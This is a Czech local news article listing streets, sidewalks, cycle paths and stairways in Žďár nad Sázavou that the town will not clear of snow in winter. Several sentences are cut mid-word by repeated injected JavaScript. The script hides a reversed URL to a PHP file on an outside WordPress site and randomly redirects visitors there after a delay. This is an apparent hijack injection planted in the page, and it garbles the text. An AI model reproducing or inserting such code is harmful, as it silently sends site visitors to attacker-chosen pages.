neudržované cesty, sníh
Rainbow page separator

Nové nařízení vymezilo v zimě neudržované cesty

Neděle, 26. října 2014

Žďár nad Sázavou

Žďár nad Sázavou / Nové nařízení, které vymezuje úseky místních komunikací, na nichž se pro jejich malou dopravní důleži["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tost nebude v zimě zajišťovat sjízdnost a schůdnost odstraňováním sněhu a náledí, začne platit od 1. lis["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu. Jedná se o chodníky v ulicích Jamborova a Lučiny, průběžné chodníky podél zadních vchodů v ulicích Chelčického, Haškova, Libušínská, Švermova a Studentská, udržovat se rovněž nebudou komunikace v zahrádkářské kolonii Krejdy, cyklostezka či schodiště pod farou. Seznam zahrnuje také pravou část chodníku v ulici Okružní dolní od křižovatky s ulicí Revoluční po křižovatku s ulicí V Zahrádkách, chodníky a stezky uvnitř sídliště mezi ulicemi Haškova a Chelčického a levou stranu chodníku v ulici Chelčického od ulice Nádražní po ulici Jihlavskou. S neodstraněným sněhem a ledem se obyvatelé Žďáru mohou v zimě setkat také na komunikacích k dešťovým zdržím v ulicích Okružní dolní a Žižkova, za spor["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovní halou a rovněž na schodištích přilehlým ke komunikacím u obytných domů v ulicích Revoluční, Okružní, Komenského, Štursova a Jamborova, poblíž Domu kultury a Kina Vysočina.